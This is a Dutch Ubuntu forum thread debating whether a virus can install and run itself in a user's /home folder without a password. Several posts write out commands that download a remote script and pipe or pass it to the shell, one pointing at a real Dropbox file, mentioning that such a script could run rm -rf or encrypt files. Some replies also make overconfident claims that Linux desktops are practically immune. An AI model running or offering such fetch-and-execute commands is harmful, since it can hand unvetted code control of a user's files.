Nieuws:

Welkom, Gast. Alsjeblieft inloggen of registreren.
Heb je de activerings-mail niet ontvangen?

Auteur Topic: Kan een virus zich installeren in /home folder?  (gelezen 1903 keer)

Offline jos34

  • Lid
Kan een virus zich installeren in /home folder?
« Gepost op: 2018/01/28, 15:34:21 »
Want daar heeft men geen password nodig toch?

Offline Ron

  • Forumteam
    • r0n
    • Over Tholen
Re: Kan een virus zich installeren in /home folder?
« Reactie #1 Gepost op: 2018/01/28, 16:42:11 »
Het kan wel, maar de file(s) zijn niet standaard uitvoerbaar, dus .................
Openstandaard Evangelist, OpenSource Promotor, OpenData voorstander.
Xubuntu gebruiker en voorstander
Er is ook nog een andere hobby.

Offline jos34

  • Lid
Re: Kan een virus zich installeren in /home folder?
« Reactie #2 Gepost op: 2018/01/28, 17:19:02 »
Het kan wel, maar de file(s) zijn niet standaard uitvoerbaar, dus .................

Huh uitvoerbaar? En is daar je pass voor nodig?

Offline Ron

  • Forumteam
    • r0n
    • Over Tholen
Re: Kan een virus zich installeren in /home folder?
« Reactie #3 Gepost op: 2018/01/28, 17:24:22 »
Nee, maar wel een extra actie :lol:
Openstandaard Evangelist, OpenSource Promotor, OpenData voorstander.
Xubuntu gebruiker en voorstander
Er is ook nog een andere hobby.

Offline jos34

  • Lid
Re: Kan een virus zich installeren in /home folder?
« Reactie #4 Gepost op: 2018/01/28, 18:10:16 »
Kan het virus niet zichzelf uitvoerbaar maken. Of uitvoerbaar maken voordat hij of zij zich op de PC installeerd?

Offline HWE64

  • Lid
Re: Kan een virus zich installeren in /home folder?
« Reactie #5 Gepost op: 2018/01/28, 18:57:48 »
Nee, maar wel een extra actie :lol:
Firejail?????
Niet panikeren, er is een Ubuntuforum.

1] Linux Mint 21.3 Xfce (Desktop hoofd pc). 2] LMDE 6 Xfce/LM21.3 Xfce (Clevo laptop) 3] LMDE 6 Xfce (Dell Laptop ). 4] LMDE 6 Xfce/Linux Mint 21.3 Xfce (HP Desktop test pc).   5] Xubuntu 22.04.3 Xfce (Dell desktop). 6] W10 (Dell Desktop)

Re: Kan een virus zich installeren in /home folder?
« Reactie #6 Gepost op: 2018/01/28, 19:02:31 »
Welk linux-virus zou dat dan moeten doen???  =D
Is er al een linux virus in omloop dan???

https://forum.ubuntu-nl.org/index.php?topic=102595.msg1005399#msg1005399
- I ♥ Linux -
Bij irritatie, voeg hier 'partyrabbit' toe -> https://forum.ubuntu-nl.org/index.php?action=profile;area=lists;sa=ignore

Offline jos34

  • Lid
Re: Kan een virus zich installeren in /home folder?
« Reactie #7 Gepost op: 2018/01/28, 19:07:02 »
Dat is het doel van deze vraag ook niet. Ik wil alleen weten of een virus zich in /home kan installeren en uitvoeren.

Offline vanadium

  • Lid
Re: Kan een virus zich installeren in /home folder?
« Reactie #8 Gepost op: 2018/01/28, 19:37:52 »
In /home bijzonder onwaarschijnlijk, want daar zijn beheerdersrechten voor nodig.

Re: Kan een virus zich installeren in /home folder?
« Reactie #9 Gepost op: 2018/01/28, 19:40:53 »
Iets wat er niet is want niet bestaat kan ook niet geïnstalleerd of uitgevoerd worden lijkt me.

In de volledig open vraag versie ..... Ja alles kan. Zelfs op de best geupdate win computer met drie virusscanners actief, want als er een onbekende backdoor is.
Maar dan zou de veiligheid van je linux en browser toch erg ver open moeten staan voordat het zo ver is. Met javascript en nog wat meer van dat soort zooi zou er iets opgestart kunnen worden, maar uitvoeren roept volgens mij dan nog steeds de wachtwoordvraag op (heb ik wel eens gehad, met een exe die vanuit een website wilde "installeren"  ^-^ )

Maar ik blijf er bij dat deze vraag (en antwoord erop) geheel niet aan de orde is.
Zou dat wel zijn met een reëel gevaar dan vermoed ik dat de linux wereld (en er buiten, want sensationeel) snel op zijn kop staat.
Kan er een vliegtuig op je hoofd neer storten? Kan er een ufo in je tuin landen? Ja.

Citaat
Probeer je geen zorgen te maken over zaken die nog niet en misschien wel nooit aan de orde zijn.
« Laatst bewerkt op: 2018/01/28, 19:42:45 door partyrabbit »
- I ♥ Linux -
Bij irritatie, voeg hier 'partyrabbit' toe -> https://forum.ubuntu-nl.org/index.php?action=profile;area=lists;sa=ignore

Offline testcees

  • Documentatieteam
    • testcees
    • www.testcees.nl
Re: Kan een virus zich installeren in /home folder?
« Reactie #10 Gepost op: 2018/01/28, 22:18:05 »
Dat is het doel van deze vraag ook niet. Ik wil alleen weten of een virus zich in /home kan installeren en uitvoeren.
Voor de duidelijkheid: zelf heb ik nog nooit last gehad van een virus in mijn /home folder en dat verwacht ik ook niet te krijgen (maar om een andere reden)

Mijn antwoord op de vraag:
Software installeren in een /home folder kan als je rechten hebt op die folder. Jij (of een programma wat jouw rechten gebruikt) kan dus software installeren in je eigen /home folder.
Dit kan je bewust doen of, in geval van malafide software (zoals een virus), onbewust of zelfs ongemerkt. Volgens mij kan dit zogenaamd met een opdrachtregel als:
curl http://ubuntu-nl.org/test.sh | bash
Of:
wget http://ubuntu-nl.org/test.sh&& sh ~/test.sh
Dit voorbeeld werkt natuurlijk niet echt maar met minder goede bedoelingen kan iemand een test.sh script-bestand plaatsen op die locatie om vervelende dingen met jouw gegevens te doen of weer andere programma’s download en opstart.
Nu blijft over de “kunst” om iemand zo ver te krijgen deze opdrachten uit te voeren of deze uit te voeren via een “lek” in andere software, bij voorkeur zonder sporen achter te laten!
Een bekende manier is zo’n opdracht te verpakken als een (niet-legale) versie van “echte” software – maar bij (de weinig) gebruikers van de Linux-desktop met goede up-to-date open-source pakketbronnen is dit lastig en (blijkbaar) weinig effectief.
Klik links bovenin op Documentatie

Offline Pjotr

  • Lid
    • Makkelijke Linuxtips
Re: Kan een virus zich installeren in /home folder?
« Reactie #11 Gepost op: 2018/01/28, 22:22:35 »
Met andere woorden: allemaal theorie, niet van praktisch belang. Laat je niet gek maken, vooral niet door Microsoft-trollen.

Re: Kan een virus zich installeren in /home folder?
« Reactie #12 Gepost op: 2018/01/29, 11:53:46 »
Mijn antwoord op de vraag:
Software installeren in een /home folder kan als je rechten hebt op die folder[/b]. Jij (of een programma wat jouw rechten gebruikt) kan dus software installeren in je eigen /home folder.
Dit kan je bewust doen of, in geval van malafide software (zoals een virus), onbewust of zelfs ongemerkt. Volgens mij kan dit zogenaamd met een opdrachtregel als:

Om software te installeren en/of activeren wordt je wachtwoord gevraagd voor de benodigde rechten.
Ik stel dus dat onbewust of ongemerkt gewoon onmogelijk is.

Ja, theoretisch zou je iets binnen kunnen halen met software die je geaccordeerd installeert. Maar juist daarom gaat altijd het dringende advies uit te installeren uit de repo's zodat ook dit weer schier onmogelijk is.

Dit voorbeeld werkt natuurlijk niet echt maar met minder goede bedoelingen kan iemand een test.sh script-bestand plaatsen op die locatie om vervelende dingen met jouw gegevens te doen of weer andere programma’s download en opstart.
Ik daag je (en iedereen) uit. Bewijs het!
Maak een website die iets in mijn home map plaatst én activeert. Dan zal ik zelfs vrijwillig die pagina bezoeken als test.
Maar dan ook onbewust en ongemerkt. Ik ga geen wachtwoord ingeven.

Met andere woorden: allemaal theorie, niet van praktisch belang. Laat je niet gek maken, vooral niet door Microsoft-trollen.
+1

Wat is dat toch dat bij hardnekkige herhaling mensen zich weer mee laten slepen in onwaarschijnlijkheden, maar dat realiteit zo moeizaam aangenomen wordt?
« Laatst bewerkt op: 2018/01/29, 12:39:42 door partyrabbit »
- I ♥ Linux -
Bij irritatie, voeg hier 'partyrabbit' toe -> https://forum.ubuntu-nl.org/index.php?action=profile;area=lists;sa=ignore

Re: Kan een virus zich installeren in /home folder?
« Reactie #13 Gepost op: 2018/01/29, 13:14:56 »
@ Forum,

Op volgend blog is er dit bericht geplaatst/geschreven:  http://baudrez.be/crossrat-malware/

Wat moeten we hier dan van denken ...???
(voor alle duidelijkheid: ik heb niks van doen met een anti-virus op mijn 'Linux-systemen')

Groet,
spievensterke.
Maté - Rolling Release 64bit. Test LinuxMint 21.xx.

Offline testcees

  • Documentatieteam
    • testcees
    • www.testcees.nl
Re: Kan een virus zich installeren in /home folder?
« Reactie #14 Gepost op: 2018/01/29, 13:17:22 »
Om software te installeren en/of activeren wordt je wachtwoord gevraagd voor de benodigde rechten.
Je (sudo-) wachtwoord is nodig als je software uit de pakketbron installeert in een systeemfolder maar om een script te downloaden en uit te voeren in je /home map, zoals in het voorbeeld (en wat hier de vraag is), niet. Daar heb je al de benodigde rechten voor.
Ik daag je (en iedereen) uit. Bewijs het!
Maak een website die iets in mijn home map plaatst én activeert. Dan zal ik zelfs vrijwillig die pagina bezoeken als test.
Maar dan ook onbewust en ongemerkt. Ik ga geen wachtwoord ingeven.
Voor mijzelf heb ik dit al vaker “bewezen” en maak er regelmatig gebruik van voor remote beheer.
Zullen we het omdraaien? Installeer in Virtualbox (of op een Raspberry Pi) zelf een kleine apache webservertje (LAMP) en plaats hier een tekstbestandje met wat terminalopdrachten en roep die aan zoals in het voorbeeld (met curl of wget): je zal dan zelf zien dat er GEEN wachtwoord wordt gevraagd.  :)
Met andere woorden: allemaal theorie, niet van praktisch belang. Laat je niet gek maken, vooral niet door Microsoft-trollen.
+1 in theorie ook heel goed te gebruiken voor bonafide doeleinden en dan wel van praktisch belang. Je moet je natuurlijk nooit gek laten maken door Microsoft-trollen.  ^-^
Klik links bovenin op Documentatie

Offline Pjotr

  • Lid
    • Makkelijke Linuxtips
Re: Kan een virus zich installeren in /home folder?
« Reactie #15 Gepost op: 2018/01/29, 13:28:25 »
Zullen we het omdraaien? Installeer in Virtualbox (of op een Raspberry Pi) zelf een kleine apache webservertje (LAMP)
Dat is dus typisch weer zo'n onzinnig voorbeeld. Niemand bij zijn volle verstand, gaat zo'n webserver installeren op een bureaucomputer. Praktische relevantie van dit voorbeeld: nul.
« Laatst bewerkt op: 2018/01/29, 13:31:17 door Pjotr »

Offline testcees

  • Documentatieteam
    • testcees
    • www.testcees.nl
Re: Kan een virus zich installeren in /home folder?
« Reactie #16 Gepost op: 2018/01/29, 13:54:24 »
Zullen we het omdraaien? Installeer in Virtualbox (of op een Raspberry Pi) zelf een kleine apache webservertje (LAMP)
Dat is dus typisch weer zo'n onzinnig voorbeeld. Niemand bij zijn volle verstand, gaat zo'n webserver installeren op een bureaucomputer. Praktische relevantie van dit voorbeeld: nul.
Dat was ook niet mijn voorstel, mijn voorstel was het in Virtualbox ofzo uit te proberen.

Maar goed, ik heb even een klein voorbeeld script gemaakt. Door de volgende opdracht te kopieeren en uit te voeren in een terminalvenster zal een script (test.sh) van dropbox worden gedownload en uitgevoerd zonder vraag om een wachtwoord:

wget https://www.dropbox.com/s/q7nmxewr4fp2pc7/test.sh && sh test.sh

Het voorbeeld script (test.sh) bevat nu een echo en een ls opdracht. Maar pas op! Dit kan, als het om malware (een virus) zou gaan, ook een rm opdracht zijn of een script wat al je persoonlijke bestanden versleuteld. Ik hoor het resultaat wel.
Klik links bovenin op Documentatie

Re: Kan een virus zich installeren in /home folder?
« Reactie #17 Gepost op: 2018/01/29, 13:54:37 »
Op volgend blog is er dit bericht geplaatst/geschreven:  http://baudrez.be/crossrat-malware/

Ten eerste lijkt deze sumiere informatie aan te geven dat er toch echt met een stuk javasoftware een trojan geactiveerd moet worden, en dus niet uit zichzelf (ongemerkt) activeert.
Mijn eerste advies; laat je niet in met java software! Erg risicovol.
Daarnaast hebben de meeste linux gebruikers al het nodige draaien (naast de browser-veiligheidsaspecten) waardoor javascript al niet eens zomaar iets vanuit een website in je directories kan plaatsen. Daar stopt het bij de meesten al.
Ik zeg niet dat virussen niet mogelijk zijn. Ik stel alleen dat onmerkbaar (zonder eigen medewerking) schier onmogelijk is. Je moet natuurlijk wel altijd zelf blijven waken, de veiligheidsaspecten in acht blijven nemen (wachtwoord, repro-software), en niet zelf vage software toestaan te installeren.

Daarnaast....
Niets over te vinden op de sites van de reguliere virusbestrijders. Dat alleen al is bedenkelijk.
Normaal geven zij uitgebreide informatie over besmettingswijze en verwijdering. Niet echt iets over te vinden.
Ik heb dus geen serieus ondersteunende informatie om dit te geloven en het klink mij dan ook als een behoorlijke hoax.

Houdt ook altijd in je achterhoofd dat een andere soort manier van hacken bestaat uit het creëren van angst om daaruit mensen aan te zetten bepaalde veiligheidsaspecten juist uit te gaan schakelen. Zeg maar in de "ben bang voor inbrekers, dus laat je voordeur open zodat de politie altijd binnen kan" trant.
Denk maar aan de welbekende windows-probleemoplosser bellers.  :evil:
En als ik zo eens op internet rond kijk, kijk vooral ook wie de bronnen van deze informatie zijn.....

AANVULLEND DRINGEND ADVIES:
GA HIERVOOR ->GÉÉN<- VAN DE VELE AANGEBODEN "VERWIJDER TOOLS" INSTALLEREN!!! En ook geen scantools.

Het zou zomaar kunnen dat je voor een niet bestaand virus juist dan een trojan binnen haalt!

Angst is een slechte raadgever. Blijf altijd zelf nadenken en weeg je bronnen.

Ik daag je (en iedereen) uit. Bewijs het!
Maak een website die iets in mijn home map plaatst én activeert. Dan zal ik zelfs vrijwillig die pagina bezoeken als test.
Maar dan ook onbewust en ongemerkt. Ik ga geen wachtwoord ingeven.
Voor mijzelf heb ik dit al vaker “bewezen” en maak er regelmatig gebruik van voor remote beheer.

Voor jezelf, maar voor mij (en anderen?) niet.
Vooralsnog kom je uitsluitend met theorieën en bashes die je zelf moet uitvoeren (dus niet automatisch). En dat klinkt geheel niet overtuigend.
En ik heb sowieso al mijn bedenkingen omtrent veiligheid bij virtualbox (en dualboot) oplossingen, en in mijn gedachte ben jij dan zelf niet veilig bezig. Wat dan niet per definitie voor iedereen op gaat.
Daarom, vriendelijk bedoeld, daag ik je uit. Show me dat het kan. Bij mij!

Voor je het verkeerd begijpt. Het gaat me helemaal niet om jou persoonlijk, maar ik als rationeel realist heb niks met theoretische informatie.
Als ik zeg dat een ufo in mijn tuin kan landen denken de meesten ook "waar gaat dit over??", maar het is hetzelfde.

Ik wil je best geloven als je het maar bewijst. Bouw een pagina en infecteer mij ongemerkt. Pas dan geloof ik het.
Zolang niet zal ik het als overbodige theoretische desinformatie blijven benoemen.
« Laatst bewerkt op: 2018/01/29, 14:17:55 door partyrabbit »
- I ♥ Linux -
Bij irritatie, voeg hier 'partyrabbit' toe -> https://forum.ubuntu-nl.org/index.php?action=profile;area=lists;sa=ignore

Offline Ron

  • Forumteam
    • r0n
    • Over Tholen
Re: Kan een virus zich installeren in /home folder?
« Reactie #18 Gepost op: 2018/01/29, 13:57:14 »
Niemand bij zijn volle verstand, gaat zo'n webserver installeren op een bureaucomputer.
Dit is juist één van de eerste dingen die ik installeer, het is de manier om websites te controleren voor publicatie en één van de manieren om PHP scripts te maken/testen/modificeren.

Maar TestCees bedoelde dit (dacht ik) als voorbeeld, om e.e.a. zelf te kunnen testen, in dat geval dus wel degelijk een voorbeeld, om te kunnen testen.
Openstandaard Evangelist, OpenSource Promotor, OpenData voorstander.
Xubuntu gebruiker en voorstander
Er is ook nog een andere hobby.

Offline testcees

  • Documentatieteam
    • testcees
    • www.testcees.nl
Re: Kan een virus zich installeren in /home folder?
« Reactie #19 Gepost op: 2018/01/29, 14:19:48 »
Ik wil je best geloven als je het maar bewijst. Bouw een pagina en infecteer mij ongemerkt. Pas dan geloof ik het.
Dat was niet de vraag in dit topic, de vraag is  of het mogelijkheid is een programma (evt. een virus) te plaatsen en uit te voeren in je /home zonder dat om een (sudo) wachtwoord word gevraagd.
Nogmaals, zie mijn reactie#16, voor een voorbeeld (onschuldig, doch geheel op eigen risico!)

Dit is iets anders dan "een pagina bouwen" die je dit (voorbeeld) ongemerkt laat uitvoeren, bijvoorbeeld door misbruik te maken van een lek in (andere) software ofzo. Dat was niet de vraag.
Klik links bovenin op Documentatie

Re: Kan een virus zich installeren in /home folder?
« Reactie #20 Gepost op: 2018/01/29, 14:29:01 »
Maar TestCees bedoelde dit (dacht ik) als voorbeeld, om e.e.a. zelf te kunnen testen, in dat geval dus wel degelijk een voorbeeld, om te kunnen testen.

Maar in dat geval ben je zelf al je pc open aan het zetten. Het is voor een particulier al bijna ondoenlijk om een webserver helemaal dicht te krijgen en houden.
De situatie van testcees is dan geheel niet relevant voor de "gemiddelde" linux-desktop. Dan kan zijn conclusie hooguit zijn dat zijn pc met linux besmet kan worden, maar dat gaat dan echt nog niet op voor iedereen.

"Inbrekers kunnen bij jou altijd binnen en tv en alles meenemen want mijn voordeur laat ik altijd wijd open staan" .....  da gaat 'm niet worden :rolleyes:

Ik wil je best geloven als je het maar bewijst. Bouw een pagina en infecteer mij ongemerkt. Pas dan geloof ik het.
Dat was niet de vraag in dit topic, de vraag is  of het mogelijkheid is een programma (evt. een virus) te plaatsen en uit te voeren in je /home zonder dat om een (sudo) wachtwoord word gevraagd.

Nee. De vraag is of een virus zich(zelf!) kan installeren.
De vraag is niet of jij zelf een virus kunt installeren. En jij antwoord op deze vaker gestelde vraag doorlopend met bashes die je zelf activeert. Geen relevant en zelfs misleidend antwoord.

Kan een virus zich installeren in /home folder?

Antwoord: Nee, niet zomaar uit zichzelf ongemerkt en ongeziens. Of je moet zelf helpen (al dan niet bewust).

En als jij vol blijft houden dat dit wel kan dan past mijn uitdaging.
Een virus zou zich dan ongemerkt installeren vanaf een website. Jij geeft scripts waarmee dat zou kunnen. Dus bouw een website en activeer zo'n script op mijn pc. Dan geloof ik je.

Ik heb zelf ook verstand van websites én hacken, en ik kan je al vertellen dat het je niet eens mee zal gaan vallen überhaupt een scriptje of zelfs maar een jpeg ongemerkt in mijn mappen te krijgen, laat staan ook nog te activeren. Ik kan het je nog sterker vertellen, het zal je al niet eens mee vallen hiermee bij een gemiddelde win installatie erdoor te komen (laat staan bij linux).
Bewijs, of stop met herhaaldelijk verspreiden van desinformatie.
« Laatst bewerkt op: 2018/01/29, 14:36:00 door partyrabbit »
- I ♥ Linux -
Bij irritatie, voeg hier 'partyrabbit' toe -> https://forum.ubuntu-nl.org/index.php?action=profile;area=lists;sa=ignore

Offline Pjotr

  • Lid
    • Makkelijke Linuxtips
Re: Kan een virus zich installeren in /home folder?
« Reactie #21 Gepost op: 2018/01/29, 14:43:37 »
Nee. De vraag is of een virus zich(zelf!) kan installeren.
De vraag is niet of jij zelf een virus kunt installeren. En jij antwoordt op deze vaker gestelde vraag doorlopend met bashes die je zelf activeert. Geen relevant en zelfs misleidend antwoord.

Kan een virus zich installeren in /home folder?

Antwoord: Nee, niet zomaar uit zichzelf ongemerkt en ongeziens. Of je moet zelf helpen.
Precies.


Bewijs, of stop met herhaaldelijk verspreiden van desinformatie.
Zeer mee eens.

Moderator edit: Niet op de man spelen......
« Laatst bewerkt op: 2018/01/29, 22:37:36 door Ron »

nahjo

  • Gast
Re: Kan een virus zich installeren in /home folder?
« Reactie #22 Gepost op: 2018/01/29, 18:48:13 »
Maar het is toch wel zo dat alles wat een gebruiker kan doen een programma ook kan doen in de sessie van de gebruiker?
Omdat te voorkomen zijn er hulpmiddelen zoals firewall, firejail, noscript, ad blockers en noem maar op. Of zijn dat soort programma's nu opeens totaal nutteloos op een linux desktop?

 

Offline vanadium

  • Lid
Re: Kan een virus zich installeren in /home folder?
« Reactie #23 Gepost op: 2018/01/29, 19:28:01 »
Maar het is toch wel zo dat alles wat een gebruiker kan doen een programma ook kan doen in de sessie van de gebruiker?
Omdat te voorkomen zijn er hulpmiddelen zoals firewall, firejail, noscript, ad blockers en noem maar op. Of zijn dat soort programma's nu opeens totaal nutteloos op een linux desktop?
Je blijft als gebruiker verantwoordelijk voor je computer. Je kan een computer volledig dichttimmeren en zorgen dat je zeker zelf geen schadelijk programma kan opstarten. Dan krijgt je computer de flexibiliteit van een smart TV. Wil je een computer waarop *jij* kan doen wat *jij* wil, dan zal die computer ook inherent open zijn voor domme dingen die je doet, bijvoorbeeld een kwaadaardig script downloaden en dat dan uitvoeren.

Persoonlijk verkies ik het, die vrijheid nog te behouden zolang het nog kan.

De hulpmiddelen die je noemt, zijn daarom niet overbodig, en verminderen risico's van buitenaf. Maar ze beletten niet dat jij een (door jou) gedownload kwaadaardig script uitvoert (door het eerst executable te maken en er daarna op te dubbel-klikken, of het via de terminal op te starten).
« Laatst bewerkt op: 2018/01/29, 19:31:32 door vanadium »

Offline testcees

  • Documentatieteam
    • testcees
    • www.testcees.nl
Re: Kan een virus zich installeren in /home folder?
« Reactie #24 Gepost op: 2018/01/29, 21:06:10 »
Maar ze beletten niet dat jij een (door jou) gedownload kwaadaardig script uitvoert (door het eerst executable te maken en er daarna op te dubbel-klikken, of het via de terminal op te starten).
Precies mijn punt, en dan zeg je: “wat stom!!”
De “reaguurders” hier zullen het niet zijn geweest maar je weet niet hoeveel lezer al mijn dropbox-voorbeeldregel uit reactie #16 in een terminalvenster hebben geplakt "om uit te proberen”.
Dat kan geen kwaad, in test.sh staat (nu) alleen een echo en ls opdracht. Maar met het grootste gemak verandering dat (nu) in een rm (-rf *)! En daar is geen (sudo-/installatie-) wachtwoord voor nodig. :evil:

Ubuntu is niet automagisch veilig (en ik ben geen Microsoft trol en promoot graag Ubuntu – vandaar mijn volledige antwoord(en))

Het is één voorbeeldje in bash, er zijn nog veel meer programmeertalen die hetzelfde (lees:alles) kunnen in de /home map. Bijvoorbeeld een “versie” van een bekende (browser-)plug-in die iemand buiten de pakketbron om download (via dropbox?)
Zoals ik in reacties#10 al zei:
Het is alleen de “kunst” (het "werk" van cybercriminelen) om iemand zo ver te krijgen deze opdracht uit te laten voeren of deze uit te voeren via (een “lek” in) andere software, bij voorkeur zonder sporen achter te laten! Dat gaat met de veel gebruikte en te controleren softwarebronnen voor Ubuntu met up-to-date en goede software niet makkelijk (bijna onmogelijk, althans ik weet zo niet hoe maar ben er altijd wel alert op).
Klik links bovenin op Documentatie